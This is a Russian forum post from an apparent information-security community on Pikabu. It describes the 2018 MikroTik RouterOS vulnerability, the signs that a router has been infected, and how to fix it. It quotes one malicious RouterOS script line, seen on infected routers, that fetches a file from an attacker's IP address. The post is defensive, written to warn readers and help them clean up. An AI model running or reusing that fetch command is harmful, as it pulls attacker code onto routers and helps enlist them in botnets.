528

Уязвимости MikroTik

К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.


Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.


Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

Дубликаты не найдены

Информационная безопасность

1.2K постов22.6K подписчиков

Добавить пост

Правила сообщества

Обязательно к прочтению для авторов:

1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".

Обязательно к прочтению для всех:

Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.


Запрещены политические holy wars.

По решению модератора или администратора сообщества пользователь будет забанен за:

1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.

2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.

3. За обвинение в киберпреступной деятельности.

4. За нарушение прочих Правил Пикабу.

Подробнее
Лучшие посты за сегодня
7567

Очень много тысяч

Очень много тысяч
7107

Главный фанат

5117

Ленивый человек всегда изобретатель

Ленивый человек всегда изобретатель Часы, Компьютерная мышка, Находчивость, Twitter
Ленивый человек всегда изобретатель Часы, Компьютерная мышка, Находчивость, Twitter
Показать полностью 2
4555

Ну да

Ну да
4073

Ребёнок, который понял суть

4073

Айкосы, они такие

Айкосы, они такие IQOS, Курение, Вонь, Офисные будни, Коллеги, Тряпка, Комментарии на Пикабу, Скриншот, Юмор
3994

Кто посмел гнать на арбидол?

Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Кто посмел гнать на арбидол? Негатив, Арбидол, Коронавирус, Длиннопост, Лекарства, Медицина, Разоблачение
Показать полностью 16
3936

Песни, которые мы заслужили

3227

Какие длинные 5 минут

Какие длинные 5 минут
3201

Ждем регистрации главного хранителя цитат )

Ждем регистрации главного хранителя цитат ) Владимир Епифанцев, Переписка, Длиннопост
Ждем регистрации главного хранителя цитат ) Владимир Епифанцев, Переписка, Длиннопост
Показать полностью 2
3039

Электроник и Сыроежкин. 2021 год, пятница 15 октября

Электроник и Сыроежкин. 2021 год, пятница 15 октября Приключения электроника, Сыроежкин, Алкоголь, Братья Торсуевы
Показать полностью 1
2914

Мигранты активизировались?

2888

Мы пережили это

2834

Жительница Москвы из свидетеля конфликта на станции «Текстильщики» стала обвиняемой по этому делу

12 октября в вагоне московского метро на станции «Текстильщики» произошёл конфликт между пассажирами. Трое уроженцев Кавказа, по данным следствия, проявили агрессию в отношении женщины, ехавшей в вагоне. За неё заступились другие пассажиры. В ходе конфликта мужчины применили насилие и высказывали угрозы.
Показать полностью
2798

Юбилей моей трагедии

Юбилей моей трагедии Жизнь, Бизнес, Болезнь, Работа, Сила духа, Знания, Компьютер, Ноутбук, Полиграфия, Здоровье, Длиннопост
Показать полностью 1
2737

К вопросу - родители лезут не в свои дела. Как я "сорвал" свадьбу

Показать полностью
2709

А потом настало утро...

А потом настало утро... Юмор, Жизненно, Проблема, Авто, Неправильная парковка
Показать полностью 1
2690

Соотечественники исполняют

Показать полностью
2512

Ответ на пост «Коричневый триллер» 

2414

Новая Octavia A8

Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: